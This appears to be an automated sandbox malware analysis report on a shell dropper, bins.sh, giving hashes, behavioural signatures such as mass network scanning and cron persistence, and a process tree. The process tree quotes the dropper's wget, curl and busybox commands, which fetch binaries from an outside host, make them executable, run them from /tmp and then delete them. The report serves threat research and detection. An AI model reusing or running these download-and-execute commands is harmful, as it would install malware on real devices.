Analysis
max time kernel: 149s
max time network: 152s
platform: debian-9_mipsel
resource: debian9-mipsel-20240611-en
resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 04-11-2024 18:57
Static task: static1
Behavioral task: behavioral1 (Sample: bins.sh, Resource: ubuntu1804-amd64-20240611-en)
Behavioral task: behavioral2 (Sample: bins.sh, Resource: debian9-armhf-20240611-en)
Behavioral task: behavioral3 (Sample: bins.sh, Resource: debian9-mipsbe-20240729-en)
Behavioral task: behavioral4 (Sample: bins.sh, Resource: debian9-mipsel-20240611-en)
General
Target: bins.sh
Size: 10KB
MD5: 31656289d25c2f37fd9883095dbb79eb
SHA1: 0428f81cd5e5364f5770bdb839f699c84f90ff85
SHA256: 7cf86de792c519df89706b72fb33fe2b558f456d4e0d0587568d9871dab861b0
SHA512: 0e73a849c9267030dd9c2f2d35e15d15ba206466485a3399264ff3b95fd7d3328d11a70ffe8fbc0aab8b3174faf17e17f9e3853be28f8cde14c996238f9f3de1
SSDEEP: 96:YttJttcLddZO+DLgc2LA8sPUJh5SgugegedhOLKCpL40jj/J5Xx5Mhxix6xDCuCY:ZpOYPOdNCw4DCuxwAw4DCuv
Malware Config
Signatures
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Contacts a large (1975) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
pid  Process
739  chmod
747  chmod
-
Executes dropped EXE 2 IoCs
Processes:
pid  Process
740  /tmp/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO
748  /tmp/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ
-
Renames itself 1 IoCs
Processes:
pid  Process
749  60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
description                    ioc                                    Process
File opened for modification   /var/spool/cron/crontabs/tmp.Tv5fhf    crontab
-
Enumerates running processes
Discovers information about currently running processes on the system
-
-
System Network Configuration Discovery 1 TTPs 7 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
pid  Process
743  wget
744  curl
746  busybox
763  wget
714  wget
736  curl
738  busybox
-
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
Processes:
description                    ioc                                            Process
File opened for modification   /tmp/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO        wget
File opened for modification   /tmp/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO        curl
File opened for modification   /tmp/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO        busybox
File opened for modification   /tmp/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ        wget
File opened for modification   /tmp/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ        curl
File opened for modification   /tmp/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ        busybox
Processes
-
Process image: command line (PID) [matched signatures]; indentation shows the parent/child relationship.

/tmp/bins.sh: /tmp/bins.sh (PID 707)
  /bin/rm: /bin/rm bins.sh (PID 709)
  /usr/bin/wget: wget http://conn.masjesu.zip/bins/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO (PID 714) [System Network Configuration Discovery; Writes file to tmp directory]
  /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO (PID 736) [System Network Configuration Discovery; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO (PID 738) [System Network Configuration Discovery; Writes file to tmp directory]
  /bin/chmod: chmod 777 kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO (PID 739) [File and Directory Permissions Modification]
  /tmp/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO: ./kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO (PID 740) [Executes dropped EXE]
  /bin/rm: rm kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO (PID 742)
  /usr/bin/wget: wget http://conn.masjesu.zip/bins/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ (PID 743) [System Network Configuration Discovery; Writes file to tmp directory]
  /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ (PID 744) [System Network Configuration Discovery; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ (PID 746) [System Network Configuration Discovery; Writes file to tmp directory]
  /bin/chmod: chmod 777 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ (PID 747) [File and Directory Permissions Modification]
  /tmp/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ: ./60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ (PID 748) [Executes dropped EXE; Renames itself; Reads runtime system information]
    /bin/sh: sh -c "crontab -l" (PID 750)
      /usr/bin/crontab: crontab -l (PID 751)
    /bin/sh: sh -c "crontab -" (PID 752)
      /usr/bin/crontab: crontab - (PID 753) [Creates/modifies Cron job]
  /bin/rm: rm 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ (PID 759)
  /usr/bin/wget: wget http://conn.masjesu.zip/bins/OgUatXxWUK6X3nVpJ7pncTwiR8EdUWbXH5 (PID 763) [System Network Configuration Discovery]
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize: 151KB
MD5: 6c583043d91c55aa470c08c87058e917
SHA1: abf65a5b9bba69980278ad09356e53de8bb89439
SHA256: 2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
SHA512: 82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5
-
Filesize: 112KB
MD5: 05d7857dcead18bbd86d2935f591873c
SHA1: 34d18f41ef35f93d5364ce3e24d74730a4e91985
SHA256: 2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512: d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize: 210B
MD5: dd8bc88936804048dca6a3fb40e2f641
SHA1: bee2596574d74937488c8b044e09b642d250ed58
SHA256: 912ae4035102d398d29aa34cf783ab8cd2be89edf35def1360336ab3d367ae28
SHA512: 6acf4d5ad33fb1ce9de40a53392a3e1fdb7468bdad6d5e10296d059ac3cdf2b06308340cea64ac4014389b2d5e254480121c442c6d4b3e8ad9d1f6e4d8e5dc23